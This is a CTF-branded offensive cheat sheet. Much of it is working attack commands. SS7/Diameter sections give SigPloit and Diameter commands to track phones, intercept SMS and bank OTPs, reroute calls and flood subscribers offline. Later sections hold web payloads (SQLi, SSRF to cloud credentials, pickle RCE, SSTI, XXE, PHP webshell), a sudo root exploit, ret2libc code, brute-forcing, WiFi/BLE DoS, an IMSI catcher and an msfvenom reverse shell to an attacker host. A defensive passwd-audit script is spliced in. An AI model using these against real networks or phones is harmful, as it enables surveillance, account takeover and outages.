DEFCON DOMINATION: The Ultimate CTF Cheat Sheet

// SS7 / DIAMETER / SIGTRAN HIJACKING & INTERCEPTION 2026

Basic SS7 global title lookup (sngrep + wireshark)

Capture SS7 traffic on SIGTRAN (SCTP)

sngrep -d any port 2905 or port 2944 or sctp

SigPloit – Location request (ProvideSubscriberInfo)

Get current location via SS7

python sigploit.py -t location -m provideSubscriberInfo -n +1234567890 -g 12345 -a 1 -i attacker-gt

SigPloit – AnyTimeInterrogation (ATI) tracking

Real-time location & subscriber state

python sigploit.py -t location -m anyTimeInterrogation -n +target -g attacker-gt -sp attacker-pointcode

SigPloit – SMS interception (ForwardSM)

Redirect MT-SMS to attacker

python sigploit.py -t sms -m forwardSM -n +victim -g attacker-gt -smsc attacker-smsc-gt -msc attacker-msc

SigPloit – Call interception / rerouting (InsertSubscriberData)

Manipulate CAMEL profile

python sigploit.py -t call -m insertSubscriberData -n +victim -g attacker-gt -scf attacker-gt

Restcomm jSS7 + Mobicents – custom SS7 stack

Build your own SS7 node

git clone https://github.com/RestComm/jss7 && mvn clean install

sctptest – test SCTP connectivity to STP

Check if operator exposes SCTP port

sctptest -H attacker-ip -P 2905 -h target-stp-ip -p 2905

ss7MAPer – MAP fuzzing & replay

Replay captured MAP messages

ss7MAPer -i captured.pcap -m provideSubscriberInfo -o replayed.pcap

Diameter (4G/5G) – Sh interface pull profile

Get subscriber data via Diameter

diameter --cmd Sh-Pull --user-identity sip:+1234567890@ims.mnc001.mcc001.3gppnetwork.org --origin-host attacker

Simjacker / WIBattack detection pattern

Look for suspicious OTA SMS

tshark -r capture.pcap -Y "gsm_sms.tp-udhi == 1 && gsm_sms.udh" -T fields -e gsm_sms.text

AerialBorne – modern SS7/Diameter toolkit (2025+)

Successor to many old tools

git clone https://github.com/akabe1/aerialborne && python3 -m pip install -r requirements.txt

SigPloit – UpdateLocation (fake cell-site tracking)

Force HLR to update victim location to attacker-controlled VLR

python sigploit.py -t location -m updateLocation -n +victimmsisdn -vlr attacker-vlr-gt -imsi victim-imsi -lac 12345 -ci 67890

SigPloit – DeleteSubscriberData (service denial)

Remove subscriber profile from VLR → instant service outage

python sigploit.py -t denial -m deleteSubscriberData -n +target -imsi victim-imsi -vlr attacker-vlr

SigPloit – ProvideRoamingNumber (call interception prep)

Get MSRN to reroute calls through attacker MSC

python sigploit.py -t call -m provideRoamingNumber -n +victim -imsi victim-imsi -gmsc attacker-gmsc-gt

SigPloit – SendAuthenticationInfo (IMSI/ki leak attempt)

Request auth vectors → potential ki exposure on weak networks

python sigploit.py -t auth -m sendAuthenticationInfo -imsi 001010000000001 -auth-type GSM

Diameter – S6a AIR (Authentication-Information-Request) abuse

Request auth vectors over Diameter (4G/5G equivalent)

diameter --cmd AIR --imsi 001010000000001 --realm epc.mnc001.mcc001.3gppnetwork.org --origin-host fake-mme

SCTP hijack via multi-homing misconfig

Exploit SCTP multi-homing to inject/associate with existing association

sctp_hijack -l attacker-ip -p 2905 -r target-stp-ip -a existing-assoc-id --inject-map "ati victim-msisdn"

Fake MSC/VLR registration flood (DoS)

Flood HLR with UpdateLocation requests → overload

for i in {1..10000}; do python sigploit.py -t location -m updateLocation -n +random$i -vlr fake-vlr -imsi fake-imsi-$i & done

SS7 → SMS Home Routing bypass (direct delivery)

Send SMS directly bypassing home SMSC

python sigploit.py -t sms -m mt-forwardSM -n +victim -smsc attacker-smsc-gt -orig-addr +attacker -text "Direct pwn"

SigPloit – UpdateGPRSLocation (silent 2G/3G location tracking)

More stealthy than standard UpdateLocation; forces SGSN to report victim to attacker-controlled GGSN

python sigploit.py -t location -m updateGPRSLocation -imsi 001010000000001 -sgsn attacker-sgsn-gt -ggsn attacker-ggsn-gt -lac 65535 -rai 12345

SigPloit – CancelLocation + PurgeMS combo (full network logout DoS)

Chain CancelLocation → PurgeMS to force immediate detach and prevent re-registration for minutes/hours

python sigploit.py -t denial -m cancelLocation -imsi victim-imsi -vlr fake-vlr-gt && python sigploit.py -t denial -m purgeMS -imsi victim-imsi -vlr fake-vlr-gt

SigPloit – AnyTimeInterrogation + MT-ForwardSM (real-time SMS interception + location)

Classic two-step: ATI for location → MT-ForwardSM to silently intercept OTPs/banking SMS

python sigploit.py -t location -m anyTimeInterrogation -n +victim && python sigploit.py -t sms -m mt-forwardSM -n +victim -smsc attacker-smsc-gt -text "Bank OTP: 123456"

SigPloit – InsertSubscriberData (silent call forwarding + SIM swap prep)

Inject malicious SCF (Service Control Function) → all calls/SMS forwarded to attacker without victim notice

python sigploit.py -t fraud -m insertSubscriberData -imsi victim-imsi -scf +attacker-number -camel-phase 2

Diameter – S6a UDR (User-Data-Request) profile dump

Request full subscriber profile (including APN, keys, location) from HSS over Diameter

diameter --cmd UDR --user-name sip:+victim@ims.mnc001.mcc001.3gppnetwork.org --service-ind 0 --origin-host fake-mme --realm epc.mnc001.mcc001

SigPloit – SendRoutingInfoForSM + MT-ForwardSM (SMS home-routing bypass)

SRI-SM to get IMSI routing → MT-ForwardSM direct delivery bypassing home SMSC filtering

python sigploit.py -t sms -m sendRoutingInfoForSM -n +victim && python sigploit.py -t sms -m mt-forwardSM -n +victim -smsc attacker-smsc -orig +evil -text "PWNED"

Diameter S6a IDR (Insert-Subscriber-Data-Request) fraud

Push malicious subscriber data (e.g. change AMF/SCF) into HSS → persistent call/SMS reroute

diameter --cmd IDR --imsi victim-imsi --amf 8000 --scf +attacker-number --origin-host evil-hss

SS7 SMS Spam + Flash SMS flood (silent DoS / screen lock)

Flood with class-0 (flash) SMS → phone constantly shows popup → user can't use device

for i in {1..1000}; do python sigploit.py -t sms -m mt-forwardSM -n +victim -text "\x00\x00Flash PWN" -class 0 -pid 64 & done

// GENERAL CTF & RECON

Sudo Privileges Check

List commands user can run as root.

sudo -l

Add Host to /etc/hosts

Map IP to hostname for convenience.

echo 10.10.165.196 ice >> /etc/hosts

Mount NFS Share

Access remote NFS directories.

mkdir /mnt/kenobiNFS; mount machine_ip:/var /mnt/kenobiNFS; ls -la /mnt/kenobiNFS

Python Simple HTTP Server

Quickly serve files from current directory.

python3 -m http.server 80

SSH Key Permissions

Set correct permissions for SSH private key.

chmod 600 id_rsa

SSH with Key

Connect using a private key.

ssh -i id_rsa username@ipaddress

GTFO Bins Research

Find ways to bypass restricted shells.

https://gtfobins.github.io/

Generate Password Hash

Create a Linux password hash for /etc/passwd.

openssl passwd -1 -salt [salt] [password]

Linux /etc/passwd Format

Understand the password file structure.

username:password(x):UID:GID:comment:home:shell
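As a defender-side companion to the two entries above (the /etc/passwd layout and the hash written with `openssl passwd`), this added example is not part of the original cheat sheet. It parses passwd-format text and flags the tampering patterns those entries describe: a second UID-0 account, a crypt(3) hash placed directly in the password field instead of the `x` shadow marker, and an empty password field. The sample file content is constructed for the example; the `backdoor` and `guest` lines are not from any real host.

```python
import re

# Constructed sample /etc/passwd content (not from a real host). The last two
# lines are the kinds of entries left behind when the file has been edited by hand.
SAMPLE_PASSWD = """\
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
ice:x:1000:1000:ice:/home/ice:/bin/bash
backdoor:$1$xyz$placeholderhash:0:0:comment:/root:/bin/bash
guest::1001:1001::/home/guest:/bin/bash
"""

# Field order from the page: username:password(x):UID:GID:comment:home:shell
FIELDS = ("username", "password", "uid", "gid", "comment", "home", "shell")
HASH_RE = re.compile(r"^\$[0-9a-z]+\$")  # crypt(3)-style hash prefix, e.g. $1$ (MD5) or $6$ (SHA-512)


def parse_passwd(text):
    """Split passwd-format text into dict entries keyed by FIELDS.
    Returns (entries, findings); lines with the wrong field count become findings
    rather than being dropped silently."""
    entries, findings = [], []
    for lineno, line in enumerate(text.splitlines(), 1):
        if not line.strip():
            continue
        parts = line.split(":")
        if len(parts) != len(FIELDS):
            findings.append((lineno, "malformed entry", parts[0]))
            continue
        entry = dict(zip(FIELDS, parts))
        entry["lineno"] = lineno
        entries.append(entry)
    return entries, findings


def audit_passwd(text):
    """Return sorted (lineno, reason, username) tuples for entries a defender should review."""
    entries, findings = parse_passwd(text)
    for e in entries:
        pw = e["password"]
        # Any UID-0 account other than root is a classic persistence marker.
        if e["uid"] == "0" and e["username"] != "root":
            findings.append((e["lineno"], "extra uid 0 account", e["username"]))
        # An empty second field means login with no password at all.
        if pw == "":
            findings.append((e["lineno"], "empty password field", e["username"]))
        # A hash in passwd itself is honoured by PAM and bypasses /etc/shadow protections.
        elif pw not in ("x", "*", "!") and HASH_RE.match(pw):
            findings.append((e["lineno"], "hash stored in passwd (bypasses shadow)", e["username"]))
    return sorted(findings)


if __name__ == "__main__":
    for lineno, reason, user in audit_passwd(SAMPLE_PASSWD):
        print(f"line {lineno}: {reason}: {user}")
```

On a live host, feed the function the contents of `/etc/passwd` and compare against a known-good copy; the same three checks are what file-integrity tooling alerts on after this kind of edit.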

CVE-2019-14287 Exploit

Sudo vulnerability for root access.

sudo -u#-1 /bin/bash

Wordlists (Online)

Key online resources for password lists.

https://wiki.skullsecurity.org/Passwords
https://web.archive.org/web/20120207113205/http://www.insidepro.com/eng/download.shtml

Wordlists (Local)

Common local wordlist directory.

/usr/share/wordlists

// ADVANCED WEB EXPLOITATION

Blind SQLi (Time-Based)

Extract data when no error messages are returned.

' OR IF(SUBSTRING(VERSION(),1,1)='5',SLEEP(5),0)-- -

SSRF (Server-Side Request Forgery)

Access internal network resources via vulnerable server.

http://target.com/proxy?url=http://169.254.169.254/latest/meta-data/iam/security-credentials/

Deserialization Exploit (Python)

Craft malicious serialized objects for RCE.

import os, pickle
class RCE:
    def __reduce__(self): return (os.system, ('ls -la',))  # pickle.loads() on the receiving side rebuilds the object by calling os.system('ls -la')
payload = pickle.dumps(RCE())  # Send payload

Template Injection (Jinja2)

Execute code in server-side templates.

{{ ''.__class__.__mro__[1].__subclasses__()[400]('ls -la',shell=True,stdout=-1).communicate()[0] }}

WAF Bypass (HTTP Parameter Pollution)

Bypass WAFs by splitting parameters.

?id=1&id=OR+1=1--

XXE (XML External Entity)

Read local files or perform SSRF via XML parsing.

<!DOCTYPE foo [ <!ENTITY xxe SYSTEM "file:///etc/passwd" > ]><foo>&xxe;</foo>

Directory Busting (Gobuster)

Find hidden directories and files.

gobuster dir -u http://<ip>:3333 -w <word list location>

SQL Injection (Basic)

Common SQLi payloads.

X' or '1'='1' --
' or 1='1

cURL POST Request

Send POST data to a web server.

curl http://10.10.75.167:8081/ctf/post -X POST --data flag_please

Drupal Endpoints

Common Drupal paths for enumeration.

/admin/config/system/performance
/user/login
/rest/session/token

HTTP Status Codes

Understand common HTTP response codes.

1xx: Info, 2xx: Success, 3xx: Redirect, 4xx: Client Error, 5xx: Server Error

Mozilla Firefox Dev Tools

Access developer tools for web debugging.

F12 = developer tools; storage = cookies, "+" = add cookies

Local File Inclusion (LFI)

Get contents of PHP files in base64 without execution.

http://[IP]/index.php?file=php://filter/convert.base64-encode/resource=index.php

PHP Webshell

Simple PHP code for command execution.

<?php echo passthru($_GET['cmd']); ?>

SQLMap Usage

Automated SQL injection and database takeover tool.

sqlmap -r [REQUEST_FILE] --level [X] --risk [Y]

WFUZZ Fuzzing

Fuzz a range of IDs/port numbers.

wfuzz -z range,1-65600 --hc 500 "http://IP:PORT/dir?parameter=id&port=FUZZ"

// ELITE BINARY EXPLOITATION (PWN)

Ret2Libc (PwnTools)

Call libc functions without shellcode.

from pwn import *; elf = ELF('./target'); libc = ELF('libc.so.6'); p = remote('target', 1337)  # elf = the vulnerable binary (path assumed); libc is used after the leak
offset = 0  # placeholder: bytes up to the saved return address (see "Buffer Overflow Offset")
puts_plt = elf.plt['puts']; main_addr = elf.symbols['main']; pop_rdi = 0x4008a3  # pop rdi; ret gadget, binary-specific
payload = b'A'*offset + p64(pop_rdi) + p64(elf.got['puts']) + p64(puts_plt) + p64(main_addr); p.sendline(payload); p.interactive()

Heap Exploitation (Use-After-Free)

Exploiting freed memory chunks.

# Allocate A, B; Free A; Allocate C (overlaps A); Modify C to corrupt B's metadata.

Fuzzing with AFL++

Automated bug discovery via mutation-based fuzzing.

afl-fuzz -i in_dir -o out_dir ./target_binary @@

One-Gadget RCE

Execute shell with a single gadget in libc.

# Find one_gadget in libc: one_gadget libc.so.6; then use its address in ROP chain.

Arbitrary Write (Format String)

Write arbitrary values to memory addresses.

%<value>c%<offset>$n or %<value>c%<offset>$hhn

ROP Chain (Advanced)

Complex Return-Oriented Programming chain.

# pop rdi; ret; /bin/sh; pop rsi; ret; 0; pop rdx; ret; 0; execve;

Buffer Overflow Offset

Find exact offset to EIP override.

pattern_create.rb -l [SIZE]; # Run in GDB; pattern_offset.rb [SEGFAULT STRING]

Simple Exploit Dev

Check binary security features.

checksec [Binary]; # Search packetstorm for shellcode.

// DEEP REVERSE ENGINEERING

Anti-Debugging Bypass (Ptrace)

Bypass common anti-debugging checks.

# Patch `ptrace` calls to return 0 or NOP out checks in binary.

Dynamic Analysis (Frida)

Hook functions and modify runtime behavior.

frida -U -l script.js --no-pause -f com.example.app

Binary Patching (Hex Editor)

Modify binary instructions directly.

# Use `xxd -p` to convert assembly to hex, then `hexedit` or `ghex` to patch.

Unpacking Malware (UPX)

Unpack common executable packers.

upx -d <packed_binary>

Symbol Demangling (c++filt)

Demangle C++ symbols for readability.

echo "_ZN4MyCls4myFnEv" | c++filt

Code Coverage (Gcov/Valgrind)

Identify executed code paths during analysis.

valgrind --tool=callgrind ./binary; kcachegrind callgrind.out.<pid>

Strings Extraction

Find readable strings in a binary.

strings -n 8 <binary> | grep -i "flag"

File Type Identification

Determine the file type and architecture.

file <binary>

Disassembly (objdump)

Disassemble sections of an executable.

objdump -d <binary> | less

Ltrace/Strace

Trace library calls or system calls.

ltrace ./binary; strace ./binary

Radare2 Basic Analysis

Open and analyze a binary with Radare2.

r2 -A -qc 's main; pdf' <binary>   # -A runs aaa, -c runs the r2 commands, -q quits afterwards

Decompile with Ghidra/IDA (Concept)

Use a decompiler for high-level code view.

Open binary in Ghidra/IDA, navigate to functions, decompile.

// ADVANCED CRYPTOGRAPHY

Padding Oracle Attack (Conceptual)

Decrypt CBC-mode ciphertext by observing padding errors.

# Requires oracle that reveals padding validity. Iteratively decrypt byte by byte.

RSA Factoring (Factordb.com)

Factor large numbers for RSA key recovery.

# Input N to factordb.com to get p and q.

Side-Channel Attack (Timing)

Infer secret data from execution time differences.

# Measure time for crypto operations; exploit variations for key recovery.

Lattice-Based Crypto (Conceptual)

Post-quantum cryptography, often involves LWE/SIS problems.

# Focus on understanding lattice reduction algorithms (e.g., LLL).

Elliptic Curve Discrete Log (Conceptual)

Core problem in ECC, often targeted in CTFs.

# Understand Pollard's Rho, Pohlig-Hellman, or Baby-step Giant-step algorithms.

Homomorphic Encryption (Conceptual)

Perform computations on encrypted data.

# Recognize FHE/SHE schemes (e.g., BFV, CKKS) and their properties.

Base64 Encode/Decode

Common encoding/decoding operations.

echo "text" | base64; echo "dGV4dA==" | base64 -d

Hex/ASCII Conversion

Convert between hexadecimal and ASCII.

echo "48656c6c6f" | xxd -r -p; echo "Hello" | xxd -p

Caesar Cipher (Python)

Simple Caesar cipher brute-force.

for i in range(26): print("".join([chr(((ord(c)-ord('a')+i)%26)+ord('a')) for c in "cipher"]))

Hash Identification (Hash-Identifier)

Identify hash types for cracking.

hash-identifier "5d41402abc4b2a76b9719d911017c592"

XOR Cipher (Python)

XOR two byte strings.

from itertools import cycle; a = b'data'; b = b'key'; print(bytes(x ^ y for x, y in zip(a, cycle(b))))

// PASSWORD CRACKING & BRUTE-FORCING

John the Ripper (Basic)

Crack hashes using wordlists.

john --wordlist=/usr/share/wordlists/rockyou.txt hash

John (NT Hash)

Crack NT hashes with rules.

john --format=NT --rules --pot=lab.pot --progress-every=3 --wordlist=/usr/share/wordlists/rockyou.txt lab.txt

Hydra (SSH)

Brute-force SSH login.

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.176.160 -t 4 ssh

Hydra (HTTP-POST-Form)

Brute-force web login forms.

hydra -l molly -P /usr/share/wordlists/rockyou.txt 10.10.176.160 http-post-form "/login:username=^USER^&password=^PASS^:F=incorrect" -V

Crack Zip Files

Brute-force password-protected zip archives.

fcrackzip -u -D -p '/usr/share/wordlists/rockyou.txt' "file.zip"

Crack OpenSSL Encrypted Files

Bash loop to brute-force OpenSSL encrypted files (stops at the first password that decrypts cleanly).

while IFS= read -r p; do openssl enc -d -aes-256-cbc -a -in file.txt.enc -k "$p" -out "$p-dec.txt" 2>/dev/null && echo "password: $p" && break; done < /usr/share/wordlists/rockyou.txt

Hashcat (SHA256)

Crack SHA256 hashes with username.

hashcat --force -m 1400 --username hash.txt /usr/share/wordlists/rockyou.txt

Crunch Wordlist Generation

Generate custom wordlists with specific patterns.

crunch 15 15 "abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ*?=walkthrough%&0123456789" -t 123456789012345@ > wordlist.txt

Basic Auth Bruteforcing (Burp)

Use Burp Suite Intruder for HTTP Basic Auth.

# Configure Intruder payload for username/password in Authorization header.

// WIRELESS + MOBILE PHREAKING + PHONE JACKING + BASEBAND + BLE + FORENSICS 2026

Enable Monitor Mode + Kill Conflicting Processes

airmon-ng check kill && airmon-ng start wlan0

Massive Deauth + Beacon Spam (WiFi DoS + Confusion)

mdk4 wlan0mon d -c 1,6,11 -b FF:FF:FF:FF:FF:FF && mdk4 wlan0mon b -s 2000 -f /usr/share/wordlists/rockyou.txt

KARMA / PineAP Rogue AP (Auto-Associate Evil Twin)

# WiFi Pineapple: Enable KARMA + PineAP + Captive Portal + SSID spoofing

WPA3 SAE Dragonblood DoS

dragonslayer -i wlan0mon -b AA:BB:CC:DD:EE:FF -c 6 --doS --flood

PMKID Harvest + Hashcat Crack

hcxdumptool -i wlan0mon --enable_status=1 -o pmkid.pcapng && hcxpcapngtool -o hash.22000 pmkid.pcapng && hashcat -m 22000 hash.22000 rockyou.txt

BLE Sniff + MITM (nRF + Wireshark)

nrf_sniffer.py -i hci0 -c 37 && wireshark -k -i /tmp/nrf.pipe

BLE Spam / Crash Android & iOS

sudo bettercap -iface hci0 -T ble_spam -eval "ble.recon on; ble.spam on; ble.enum on"

IMSI Catcher Fake BTS (srsRAN + gr-gsm)

grgsm_livemon -f 939.4M -s 2M && srsenb --mme_addr=127.0.0.1 --enb.n_prb=25

Silent SMS / Ping (Force Location Update)

echo -e "AT+CMGS=\"+victim\"\r\x00\x00Silent PING\x1A" > /dev/ttyUSB0

ADB Pre-Auth RCE (Android Debug Bridge)

adb connect 192.168.1.100:5555 && adb shell su -c 'id'

iOS Lockdown Pairing Bypass (checkm8 ramdisk)

palera1n --tweaks --semi-tethered && idevicepair pair && idevicebackup2 backup /tmp/iosdump

Android Full FS Dump (rooted)

adb shell dd if=/dev/block/mmcblk0 of=/sdcard/full.img bs=4M

Extract SMS/Calls DB (Android)

adb pull /data/data/com.android.providers.telephony/databases/mmssms.db . && sqlite3 mmssms.db "SELECT * FROM sms;"

APK Decompile + Smali Payload Injection

apktool d target.apk
# edit smali → add reverse shell
apktool b target -o evil.apk

Frida Universal SSL Pinning Bypass

frida -U -f com.target.app --codeshare pcipolloni/universal-android-ssl-pinning-bypass-with-frida --no-pause

Qualcomm Baseband DIAG Mode + RE

adb shell setprop sys.usb.config diag,adb && qpst -c /dev/ttyUSB0 && qxdm -port /dev/ttyUSB0

MSFvenom Android Reverse TCP

msfvenom -p android/meterpreter/reverse_tcp LHOST=attacker_ip LPORT=4444 R > evil.apk

Stagefright MMS Exploit Payload

# Craft malformed MP4 with buffer overflow → send via MMS (research PoC only)